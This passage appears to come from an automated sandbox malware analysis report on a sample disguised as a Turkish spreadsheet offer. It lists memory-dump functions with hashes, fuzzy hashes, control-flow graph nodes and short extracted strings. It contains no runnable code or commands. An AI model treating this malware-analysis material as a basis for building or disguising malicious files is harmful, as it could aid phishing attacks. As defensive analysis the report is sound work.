                                                  • Opcode Fuzzy Hash: 2803c01b6cf0f23190b1ebe3bc1d969a1f34d3be9c650fba38f90942314f1150
                                                  • Instruction Fuzzy Hash: 54E14B74A02218CFDB54DFA9D954BEDBBF2FB49314F1090AAD409AB291DB345E85CF00
                                                  Function 05AEC228 Relevance: .3, Instructions: 332COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91f0b4ffdf5f459162cba2e8bba9714d3aaceee16a712f59e217ec159c8c4fe7
                                                  • Instruction ID: d653120b4464f6341bcb1ac040953837746e696e63a791f06d7f2b2304c335df
                                                  • Opcode Fuzzy Hash: 91f0b4ffdf5f459162cba2e8bba9714d3aaceee16a712f59e217ec159c8c4fe7
                                                  • Instruction Fuzzy Hash: B7E14A74902218CFDB54DFA9D968BEDBBF2FB49314F1090AAD409AB291DB345E85CF00
                                                  Function 05B18978 Relevance: .3, Instructions: 295COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1bdd2169ae958442122a07d6534b9dadf1a582a93dd486bf7b1e6ec6567ae9f
                                                  • Instruction ID: 251928405cb0160fe292a9cfa42715d582eda44f5385fe089ecf84ead4b412c8
                                                  • Opcode Fuzzy Hash: b1bdd2169ae958442122a07d6534b9dadf1a582a93dd486bf7b1e6ec6567ae9f
                                                  • Instruction Fuzzy Hash: E7D138B0E06258CFDB54CFA9D984BADBBF2FB49300F5480A9E409A7294DB746D85CF05
                                                  Function 05B18988 Relevance: .3, Instructions: 293COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 737f73dc3ef036516b328dc3632f479c416c8a1687c426f4deab3ad7acb96d94
                                                  • Instruction ID: dca40e7f9fcadfa367aa9d6fa94b76ec2d2444b0fb8e155500138fb16a4f3092
                                                  • Opcode Fuzzy Hash: 737f73dc3ef036516b328dc3632f479c416c8a1687c426f4deab3ad7acb96d94
                                                  • Instruction Fuzzy Hash: 5ED128B0E06258CFDB54CFA5D984BADBBF2FB49304F5080A9E409A7294DB746985CF05
                                                  Function 05E01438 Relevance: .3, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0411102746a02ae8819d62fca9c6c3c18aa18ceb06a31a76965a7dc22ef14492
                                                  • Instruction ID: 981d520a484cfd87ca6cf73e4eaf4636f908b74d606690fa11576d799171caa3
                                                  • Opcode Fuzzy Hash: 0411102746a02ae8819d62fca9c6c3c18aa18ceb06a31a76965a7dc22ef14492
                                                  • Instruction Fuzzy Hash: CDB11B74E06218CFDB58DFAAD844BADBBB2FB49304F10A1A9D449AB394DB345D85CF10
                                                  Function 05B1F950 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c9821391dafa951c8be48951431247a65a92bc4f22e3a0c9ad9d72b4b762734
                                                  • Instruction ID: ed91c6a9ed36ef2ef99c12062ba383e2692641c7e57a1dede0ce6941a9618037
                                                  • Opcode Fuzzy Hash: 6c9821391dafa951c8be48951431247a65a92bc4f22e3a0c9ad9d72b4b762734
                                                  • Instruction Fuzzy Hash: D3B1D5B0D15218CFDB54CFAAD484BADBBF2FB49300F5481A9D80AAB355D7346986CF14
                                                  Function 05B1F940 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b277756871d1c2155c378258e6bf635f4bbe8ef9c648f6a4ba7a089ee87e421
                                                  • Instruction ID: 99526c618d5bc792653c889bf3e5d183f7a2dc82f69abf3045343b0003eefbc9
                                                  • Opcode Fuzzy Hash: 3b277756871d1c2155c378258e6bf635f4bbe8ef9c648f6a4ba7a089ee87e421
                                                  • Instruction Fuzzy Hash: 06B1C4B0D15218CFDB54CFAAD484BADBBF2FB49300F5481AAD80AAB355D7346986CF14
                                                  Function 031153F8 Relevance: .2, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b116d2ef78530cb8d985872b6dc78874598c5d1080c3a5263bccdc3bbcb5cc90
                                                  • Instruction ID: edb59cdfcf731f0e2a0805df1bf51160c7fde4fa5a685442a93999ccfb6e854e
                                                  • Opcode Fuzzy Hash: b116d2ef78530cb8d985872b6dc78874598c5d1080c3a5263bccdc3bbcb5cc90
                                                  • Instruction Fuzzy Hash: 24818A31A04104CFDB14CE69D484BEEB7B3FBCE315F6581B5D10A9B664D7789891CB50
                                                  Function 03116DF7 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d34a6d3908daa8fb086993e10e53199b29f525a73adcf31dbc40564b585d60f6
                                                  • Instruction ID: 0988c07afbcb106356ed3a309efd8564a13ceb5670c93ce65d08157cdaa88e6f
                                                  • Opcode Fuzzy Hash: d34a6d3908daa8fb086993e10e53199b29f525a73adcf31dbc40564b585d60f6
                                                  • Instruction Fuzzy Hash: 3B91E671A06104CFD728CF68D488BE9B7B2FB8C311F16C2A5D9169B2A5C375A8A5CF50
                                                  Function 05B14B41 Relevance: .2, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65369a5a4a19566b67a61ddcb7035b80d80af4705c2a83b84d7959e78ec273f2
                                                  • Instruction ID: 759ace1e273f3109b0ca0419c84e0f57ef6018eaef63c8b0afd4154fd9a76a76
                                                  • Opcode Fuzzy Hash: 65369a5a4a19566b67a61ddcb7035b80d80af4705c2a83b84d7959e78ec273f2
                                                  • Instruction Fuzzy Hash: 8A8119B4A01209DFCF44DFA9D580AAEBBF6FF49300F508469E809AB354DB35AD41CB55
                                                  Function 03114E18 Relevance: .2, Instructions: 207COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41ab1f6f7724dee470f3c3e5eac623956505fa8d8e96f6b960d91a136f9877af
                                                  • Instruction ID: d82c153562c26a20cb6b68f1ff782af1d80c22b357d4e4cbc3798aac7ef8e77d
                                                  • Opcode Fuzzy Hash: 41ab1f6f7724dee470f3c3e5eac623956505fa8d8e96f6b960d91a136f9877af
                                                  • Instruction Fuzzy Hash: 80813A71A05104CFDB28CF89D484BEAB7B3FB88311F2AC1B5D1059B659CB799DA2CB50
                                                  Function 03116E08 Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8151d1d1484df557f32e3619810d214c6149639efc973ac6ef0cc59d7e5b3b4d
                                                  • Instruction ID: c9a5d674c5f262c19853d6cb3fa4c66a7b9c669455382e4e0b6d401056851cd5
                                                  • Opcode Fuzzy Hash: 8151d1d1484df557f32e3619810d214c6149639efc973ac6ef0cc59d7e5b3b4d
                                                  • Instruction Fuzzy Hash: 0491D774A06104CFD728CF68D488BE9F7B2FB8C311F16C2A5D9169B2A5C375A8A5CF50
                                                  Function 03116968 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88d73266c9b21af6a8c137c414be440c727d616115665a96b3124ca91203e95b
                                                  • Instruction ID: a9c28944918661b156ec2f0226d09a57ac0101b6e11ff6a74b70439c6f0bddb7
                                                  • Opcode Fuzzy Hash: 88d73266c9b21af6a8c137c414be440c727d616115665a96b3124ca91203e95b
                                                  • Instruction Fuzzy Hash: 39812930A05218CFD718CF59D684FE9F7B2FB88310F5582B5E9065B3A9D735A891CB80
                                                  Function 03116978 Relevance: .2, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a6e4284f06d7464bc5edbe1f31751b31fc3956a01d6854e241b098bfc673647
                                                  • Instruction ID: 4c87161e6855dd6354cb9e406838a01cc688b95785743da963a03c2a41585934
                                                  • Opcode Fuzzy Hash: 4a6e4284f06d7464bc5edbe1f31751b31fc3956a01d6854e241b098bfc673647
                                                  • Instruction Fuzzy Hash: 67810930A05218CFD718CF49D684FD9F7B2FB88310F5682B5E9065B3A9D775A891CB80
                                                  Function 05B1CF68 Relevance: .2, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f21bf5bcbab88c181e0a3d1e460563356f9b80528e55c0f694d7a1513b216c5
                                                  • Instruction ID: 562662e31c3dbfee22155da69d34c38c7f7324729ec43a094a000b867aff1835
                                                  • Opcode Fuzzy Hash: 2f21bf5bcbab88c181e0a3d1e460563356f9b80528e55c0f694d7a1513b216c5
                                                  • Instruction Fuzzy Hash: DC910C74A41219CFDB64DF29D955BADBBB2FB48300F5080EAD80EA7254DB346E81CF54
                                                  Function 05B14BD8 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8266ca498c506ba77f81afbbfde3785493101ef78f3358be4e95bd7f826af545
                                                  • Instruction ID: 92a0894bef40237fc9fa246c9240fdcde62d30dede9e2d9f1a3d7dd40af275bc
                                                  • Opcode Fuzzy Hash: 8266ca498c506ba77f81afbbfde3785493101ef78f3358be4e95bd7f826af545
                                                  • Instruction Fuzzy Hash: BB71F9B4E01209DFCB44DFA9D580AAEBBF6FF89300F508469E805AB354DB34A945CF55
                                                  Function 05B14BE8 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 682571b2fe809ea60be5e544fc88baa868bc93047a14a5a424567b1a7f7b18ad
                                                  • Instruction ID: ca0e75319030d9e56cee6c8febc60b701e06cf9fbbdbe7ecc15828ab9f26ed5e
                                                  • Opcode Fuzzy Hash: 682571b2fe809ea60be5e544fc88baa868bc93047a14a5a424567b1a7f7b18ad
                                                  • Instruction Fuzzy Hash: 2F61E9B4E01209DFCB44DFA9D580AAEBBF6FF89300F508469E809AB354DB34A945CF55
                                                  Function 057EC05B Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85762533e98f8927983293dc08106cbf768cb5d74fd82c07e40e2851d59d836f
                                                  • Instruction ID: 0435121ff50cb58aadefd4d309cf341174a560e2871c61dc6e5c641818992327
                                                  • Opcode Fuzzy Hash: 85762533e98f8927983293dc08106cbf768cb5d74fd82c07e40e2851d59d836f
                                                  • Instruction Fuzzy Hash: D571E3B4906318CFEB15CFAAD884BADBBFABB4D304F5081A9D40AAB255D7745D81DF00
                                                  Function 057E0007 Relevance: .1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb5ed12187583404890c3016f308acd3b33d25b85f68e97fea05bc34b5bb3ab1
                                                  • Instruction ID: ab62f81ca8b07e00ad33143840d96f8f9a6b2a60089877dd45dce4a8e5683938
                                                  • Opcode Fuzzy Hash: bb5ed12187583404890c3016f308acd3b33d25b85f68e97fea05bc34b5bb3ab1
                                                  • Instruction Fuzzy Hash: 7C5118B1E056588BDB19CF6BD84469ABBF3BFC9300F08C0BAC548AB265DB744985CF11
                                                  Function 057E4620 Relevance: .1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d58d352b4b861f53f17de621cebe03822f907a6b7c3ed00899266ac91c3cde8d
                                                  • Instruction ID: 887f0fa18166e90fa53f4f6d1cfdb111052314f583575c1618affd2d05ee441c
                                                  • Opcode Fuzzy Hash: d58d352b4b861f53f17de621cebe03822f907a6b7c3ed00899266ac91c3cde8d
                                                  • Instruction Fuzzy Hash: 2431C871E056188BDF28DF6BD8546DEBAF7BFCD300F14C0AA9449A7264DB304A959F40
                                                  Function 057EF390 Relevance: 7.7, Strings: 6, Instructions: 152COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 637 57ef390-57ef3dc 642 57ef55a-57ef592 637->642 643 57ef3e2-57ef3f4 637->643 655 57ef599-57ef59c 642->655 656 57ef594-57ef596 642->656 646 57ef3f6-57ef442 643->646 647 57ef444-57ef48d 643->647 674 57ef490-57ef4d0 646->674 647->674 659 57ef59d-57ef5c6 655->659 656->659 662 57ef5cc-57ef5d5 659->662 663 57ef815-57ef81c 659->663 664 57ef64b-57ef664 662->664 665 57ef5d7-57ef5db 662->665 677 57ef66a 664->677 678 57ef791-57ef7a1 664->678 667 57ef5dd-57ef5f2 665->667 668 57ef5f4-57ef600 665->668 670 57ef609-57ef646 667->670 668->670 670->663 688 57ef4da-57ef4e4 674->688 689 57ef4d2-57ef4d8 674->689 677->678 682 57ef7ba-57ef7c6 678->682 683 57ef7a3-57ef7b8 678->683 684 57ef7cf-57ef810 682->684 683->684 684->663 690 57ef4e7-57ef500 688->690 689->690 693 57ef507-57ef52a 690->693 697 57ef52c-57ef548 693->697 698 57ef550-57ef557 693->698 697->698
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                  • API String ID: 0-463314800
                                                  • Opcode ID: ecb91b503463e454d005df4a005da1317f0c5fe3969db0971e81c6afb09964ba
                                                  • Instruction ID: 94ba0ab36ed9fe49ad5cdee9fe39782ecff947e09042b2c1865ff1e8cdfe93ae
                                                  • Opcode Fuzzy Hash: ecb91b503463e454d005df4a005da1317f0c5fe3969db0971e81c6afb09964ba
                                                  • Instruction Fuzzy Hash: 2A51A270A402058FC718EF69D950BAEBBEBBFD8700F14892DC44997269DF78990687A1
                                                  Function 05760048 Relevance: 4.4, Strings: 2, Instructions: 1897COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 6aad9b2893d2bed00d95cf21dbe1086c1858aa41358b3348a3991d3fcee2108d
                                                  • Instruction ID: bbbadca28e848aafc30020fd719456cba31cc2173414fd14d4c50938afe8fa79
                                                  • Opcode Fuzzy Hash: 6aad9b2893d2bed00d95cf21dbe1086c1858aa41358b3348a3991d3fcee2108d
                                                  • Instruction Fuzzy Hash: ACF2D070949389DFDB16CBA4CC5CBAE7FB5BF06300F14809AE941AB2E2C7745845DB62
                                                  Function 057EE0C0 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1356 57ee0c0-57ee0e8 1359 57ee0ea-57ee131 1356->1359 1360 57ee136-57ee144 1356->1360 1405 57ee58d-57ee594 1359->1405 1361 57ee146-57ee151 1360->1361 1362 57ee153 1360->1362 1363 57ee155-57ee15c 1361->1363 1362->1363 1366 57ee245-57ee249 1363->1366 1367 57ee162-57ee166 1363->1367 1371 57ee29f-57ee2a9 1366->1371 1372 57ee24b-57ee25a 1366->1372 1368 57ee16c-57ee170 1367->1368 1369 57ee595-57ee5bd 1367->1369 1373 57ee182-57ee1e0 1368->1373 1374 57ee172-57ee17c 1368->1374 1378 57ee5c4-57ee5ee 1369->1378 1375 57ee2ab-57ee2ba 1371->1375 1376 57ee2e2-57ee308 1371->1376 1384 57ee25e-57ee263 1372->1384 1412 57ee1e6-57ee240 1373->1412 1413 57ee653-57ee662 1373->1413 1374->1373 1374->1378 1390 57ee5f6-57ee60c 1375->1390 1391 57ee2c0-57ee2dd 1375->1391 1396 57ee30a-57ee313 1376->1396 1397 57ee315 1376->1397 1378->1390 1385 57ee25c 1384->1385 1386 57ee265-57ee29a call 57edb88 1384->1386 1385->1384 1386->1405 1415 57ee614-57ee64c 1390->1415 1391->1405 1403 57ee317-57ee33f 1396->1403 1397->1403 1420 57ee345-57ee35e 1403->1420 1421 57ee410-57ee414 1403->1421 1412->1405 1422 57ee669-57ee66a 1413->1422 1423 57ee664-57ee668 1413->1423 1415->1413 1420->1421 1445 57ee364-57ee373 1420->1445 1424 57ee48e-57ee498 1421->1424 1425 57ee416-57ee42f 1421->1425 1427 57ee66c-57ee670 1422->1427 1428 57ee671-57ee67d 1422->1428 1423->1422 1430 57ee49a-57ee4a4 1424->1430 1431 57ee4f5-57ee4fe 1424->1431 1425->1424 1453 57ee431-57ee440 1425->1453 1427->1428 1436 57ee67f-57ee685 1428->1436 1437 57ee687-57ee68d 1428->1437 1443 57ee4aa-57ee4bc 1430->1443 1444 57ee4a6-57ee4a8 1430->1444 1433 57ee536-57ee583 1431->1433 1434 57ee500-57ee52e 1431->1434 1459 57ee58b 1433->1459 1434->1433 1436->1437 1438 57ee68e-57ee6cb 1436->1438 1449 57ee4be-57ee4c0 1443->1449 1444->1449 1461 57ee38b-57ee3a0 1445->1461 1462 57ee375-57ee37b 1445->1462 1457 57ee4ee-57ee4f3 1449->1457 1458 57ee4c2-57ee4c6 1449->1458 1467 57ee458-57ee463 1453->1467 1468 57ee442-57ee448 1453->1468 1457->1430 1457->1431 1463 57ee4c8-57ee4e1 1458->1463 1464 57ee4e4-57ee4e7 1458->1464 1459->1405 1473 57ee3d4-57ee3dd 1461->1473 1474 57ee3a2-57ee3ce 1461->1474 1469 57ee37f-57ee381 1462->1469 1470 57ee37d 1462->1470 1463->1464 1464->1457 1467->1413 1479 57ee469-57ee48c 1467->1479 1477 57ee44c-57ee44e 1468->1477 1478 57ee44a 1468->1478 1469->1461 1470->1461 1473->1413 1476 57ee3e3-57ee40a 1473->1476 1474->1415 1474->1473 1476->1421 1476->1445 1477->1467 1478->1467 1479->1424 1479->1453
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq$Haq$Haq
                                                  • API String ID: 0-3013282719
                                                  • Opcode ID: 22769b397454af4060b8cab8ce742eb0b1fa7b06ad3823e8e3cbb40d1daf3dac
                                                  • Instruction ID: 30c438f973c2b24fbe113758517102031a9257b5c5c35ae6d47c4be03dfd2fcb
                                                  • Opcode Fuzzy Hash: 22769b397454af4060b8cab8ce742eb0b1fa7b06ad3823e8e3cbb40d1daf3dac
                                                  • Instruction Fuzzy Hash: 28125C70A003059FCB25DFA5D484A6EBBB6FF89700F14896DE8069B364DB35EC46DB90
                                                  Function 05E3F220 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1492 5e3f220-5e3f25d 1494 5e3f27f-5e3f295 1492->1494 1495 5e3f25f-5e3f264 call 5e3fb38 1492->1495 1500 5e3f60b-5e3f61f 1494->1500 1501 5e3f29b-5e3f2a7 1494->1501 1497 5e3f26a-5e3f26c 1495->1497 1497->1494 1498 5e3f26e-5e3f276 1497->1498 1498->1494 1510 5e3f65f-5e3f668 1500->1510 1502 5e3f3d8-5e3f3df 1501->1502 1503 5e3f2ad-5e3f2b0 1501->1503 1506 5e3f3e5-5e3f3ee 1502->1506 1507 5e3f50e-5e3f548 1502->1507 1504 5e3f2b3-5e3f2bc 1503->1504 1508 5e3f2c2-5e3f2d6 1504->1508 1509 5e3f700 1504->1509 1506->1507 1511 5e3f3f4-5e3f500 1506->1511 1589 5e3f54b call 5ae1900 1507->1589 1590 5e3f54b call 5ae1910 1507->1590 1526 5e3f3c8-5e3f3d2 1508->1526 1527 5e3f2dc-5e3f371 1508->1527 1518 5e3f705-5e3f709 1509->1518 1512 5e3f66a-5e3f671 1510->1512 1513 5e3f62d-5e3f636 1510->1513 1584 5e3f502 1511->1584 1585 5e3f50b 1511->1585 1516 5e3f673-5e3f6b6 1512->1516 1517 5e3f6bf-5e3f6c6 1512->1517 1513->1509 1520 5e3f63c-5e3f64e 1513->1520 1516->1517 1521 5e3f6eb-5e3f6fe 1517->1521 1522 5e3f6c8-5e3f6d8 1517->1522 1524 5e3f714 1518->1524 1525 5e3f70b 1518->1525 1534 5e3f650-5e3f655 1520->1534 1535 5e3f65e 1520->1535 1521->1518 1522->1521 1536 5e3f6da-5e3f6e2 1522->1536 1525->1524 1526->1502 1526->1504 1568 5e3f373-5e3f389 1527->1568 1569 5e3f390-5e3f3c3 1527->1569 1587 5e3f658 call 5ae20a0 1534->1587 1588 5e3f658 call 5ae20b0 1534->1588 1535->1510 1536->1521 1544 5e3f551-5e3f572 1551 5e3f57d-5e3f602 1544->1551 1551->1500 1568->1569 1569->1526 1584->1585 1585->1507 1587->1535 1588->1535 1589->1544 1590->1544
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q
                                                  • API String ID: 0-705557208
                                                  • Opcode ID: f05b974acce995bdc15e17ed293139d05a000569ac4a6dcc2d25cb527a720e7d
                                                  • Instruction ID: e1103de7e80f52ee34dc502dacd52cff5ae10d5896c2d3482e093cda19ce0d33
                                                  • Opcode Fuzzy Hash: f05b974acce995bdc15e17ed293139d05a000569ac4a6dcc2d25cb527a720e7d
